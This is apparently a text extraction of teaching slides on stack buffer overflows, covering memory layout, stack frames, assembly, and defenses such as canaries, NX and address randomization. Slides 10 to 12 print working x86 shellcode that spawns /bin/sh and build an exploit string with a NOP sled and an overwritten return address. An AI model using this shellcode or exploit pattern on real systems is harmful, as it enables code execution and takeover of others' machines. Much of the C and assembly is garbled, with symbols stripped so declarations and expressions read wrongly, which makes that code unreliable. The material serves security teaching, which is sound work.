Overflows

1
Overflows Exploits
2
In the beginning

• 11/02/1988 Robert Morris, Jr., a graduate
  student in Computer Science at Cornell, wrote an
  experimental, self-replicating, self-propagating
  program called a worm and injected it into the
  Internet. One of the programs it attacked was
  fingerd which contained a buffer overflow.
• 02/13/1995 Thomas Lopatic posts to
  Bugtraq Hello there, we've installed the NCSA
  HTTPD 1.3 on our WWW server (HP9000/720, HP-UX
  9.01) and I've found, that it can be tricked
  into executing shell commands.
• 08/11/1996 Smashing the Stack For Fun And
  Profit by Aleph1 (Phrack 49) syslog, splitvt,
  sendmail 8.7.5, Linux/FreeBSD mount, Xt library,
  at, etc.

3
Program Memory
Your Program
include ltstdio.hgt include ltstring.hgt static
int counter static int another_variable
0xAABBCCDD void do_something(char from)
char to32 strcpy(to , from)
counter int main( int argc, char argv)
char msg "This is a constant string"
counter 0 do_something(msg)
printf("d Somethings Done\n", counter)
return 0
High Memory Addresses
Args Environment Variables
Stack
Unused Memory
Heap
Un-Initialized Data Segment (bss)
Initialized Data
RO data
Low Addresses
Text Segment
4
The Stack

• A stack is a type of data structure.
• The last object put on to the stack is the first
  that is removed. (LIFO)
• Push add something to the stack
• Pop remove something from the stack

5
Function Calls The Stack

• When a function is called
• Function arguments are pushed on the stack.
• Return address is pushed on the stack (in the
  call instruction).
• The previous functions base pointer is pushed on
  the stack.
• Local variables are pushed on the stack.

6
Functions Calls The Stack

• include ltstdio.hgt
• int add(int x, int y)
• return x y
• int main(int argc, char argv)
• int num 0
• num add(4,5)
• printf("num d\n", num)
• return 0

0xc0000000
Num 0
Stack
5
Stack Frame
4
Ret addr
Saved base ptr
(Adds local vars)

• Function arguments are pushed on the stack.
• Return address is pushed on the stack (in the
  call instruction).
• The previous functions base pointer is pushed on
  the stack.
• Local variables are pushed on the stack.

Stack Frame
0x08000000
Heap
7
Function Calls The Stack

• main
• pushl ebp
• movl esp, ebp
• subl 24, esp
• andl -16, esp
• movl 0, eax
• addl 15, eax
• addl 15, eax
• shrl 4, eax
• sall 4, eax
• subl eax, esp
• movl 0, -4(ebp)
• movl 5, 4(esp)
• movl 4, (esp)
• call add
• movl eax, -4(ebp)
• movl -4(ebp), eax
• movl eax, 4(esp)

add pushl ebp movl esp, ebp
movl 12(ebp), eax addl 8(ebp), eax
popl ebp ret
esp
ebp
ebp1
Stack
0
X 9
5
esp
4
esp
eip
ebp2
ebp
int add(int x, int y) return x
y int main(int argc, char argv)
int num 0 num add(4,5) printf("num
d\n", num) return 0
8
Overflows
Ptr to msg
High Memory Addresses
include ltstdio.hgt include ltstring.hgt static
int counter static int another_variable
0xAABBCCDD void do_something(char from)
char to32 strcpy(to , from)
counter int main( int argc, char argv)
char msg "This is a constant string"
counter 0 do_something(msg)
printf("d Somethings Done\n", counter)
return 0
Return Addr
Base Ptr
g\0
trin
nt_s
32 bytes for to
nsta
a_co
_is_
This
Low Addresses
9
Overflows
g_fo
Ptr to msg
include ltstdio.hgt include ltstring.hgt static
int counter static int another_variable
0xAABBCCDD void do_something(char from)
char to32 strcpy(to , from)
counter int main( int argc, char argv)
char msg "This is a constant string that is
too long for our buffer" counter 0
do_something(msg) printf("d Somethings
Done\n", counter) return 0
Return Addr
_lon
Base Ptr
_too
at_is
g_th
trin
nt_s
32 bytes for to
nsta
a_co
_is_
This
10
Shellcode

• Shell code is raw machine code that performs some
  useful function for an attacker (usually to grant
  a shell)
• char shellcode "\xeb\x1f\x5e\x89\x76\x08\x31
  \xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb
  \x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/s
  h"
• See http//www.vividmachines.com/shellcode/shell
  code.html

11
Overflows
Ptr to msg
include ltstdio.hgt include ltstring.hgt void
do_something(char from) char to45
strcpy(to , from) int main( int argc, char
argv) char msg
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\
x46\x0c\xb0\x0b "\x89\xf3\x8d\x4e\x08\x8d
\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd
"\x80\xe8\xdc\xff\xff\xff/bin/shAAAABBBB"
do_something(msg) return 0
Return Addr
BBBB
0xc0a104b0
Base Ptr
AAAA
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\
x46\x0c\xb0\x0b "\x89\xf3\x8d\x4e\x08\x8d
\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
0xc0a104b0
12
Overflows
include ltstdio.hgt include ltstring.hgt void
do_something(char from) char to256
strcpy(to , from) int main( int argc, char
argv) char msg
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\
x46\x0c\xb0\x0b "\x89\xf3\x8d\x4e\x08\x8d
\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd
"\x80\xe8\xdc\xff\xff\xff/bin/shAAAABBBB"
do_something(msg) return 0
0xc0a104b0
AAAA
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\
x46\x0c\xb0\x0b "\x89\xf3\x8d\x4e\x08\x8d
\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
\x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90
\x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90
\x90 \x90
0xc0a104??
13
Defenses

• strncpy(char dest, char src, int n)
• Use safe(r) functions.
• Check the size of the input before you copy
  blindly

void do_something(char from) char
to256 strncpy(to , from, 255) to256
\0
14
Defenses

• No eXecute stack (NX bit)
• Code should be run from the text section, the
  stack should never be the target of the
  instruction pointer.
• Make the stack non-executable, and the processor
  will fault on a stack overflow attack

15
Defenses

• Stack Canary
• Generated by the compiler
• A random value is pushed to the stack after the
  return address
• Before returning from a function the canary
  value is checked to seeif it matches the set
  value
• An attacker cannot determine the canary value
  before the executionof the program

Ptr to msg
Return Addr
Base Ptr
Canary 0x31332241
g\0
trin
nt_s
nsta
a_co
_is_
This
16
Defenses

• Randomized Address Layouts
• Segments of memory can be relocated slightly to
  produce different offsets each time a program is
  run
• Hardcoded address (in shellcode for example) will
  not be valid from one run to the next

17
Recent Overflows

• Microsoft Windows Animated Cursor Remote Code
  Execution Vulnerability (3/28/2007)
• http//vil.nai.com/vil/Content/v_vul28505.htm
• A remote code execution vulnerability exists in
  the way that cursor, animated cursor, and icon
  formats are handled. An attacker could try to
  exploit the vulnerability by constructing a
  malicious cursor or icon file that could
  potentially allow remote code execution if a user
  visited a malicious Web site or viewed a
  malicious e-mail message. An attacker who
  successfully exploited this vulnerability could
  take complete control of an affected system.
• Windows 2000  SP4
• Windows 2003  SP0 - SP2
• Windows XP  SP2
• Vista  SP0

18
Links

• Attack
• http//www.phrack.org/archives/49/P49-14
• http//en.wikipedia.org/wiki/Buffer_overflow
• http//seclists.org/bugtraq/1995/Feb/0109.html
• Defense
• http//fedoraproject.org/wiki/Security/Features
• http//www.grsecurity.net/
• http//www.trl.ibm.com/projects/security/ssp/
• Misc
• BugTraq - http//www.securityfocus.com/archive/1
• VulnDev - http//www.securityfocus.com/archive/82
• Metasploit - http//www.metasploit.com/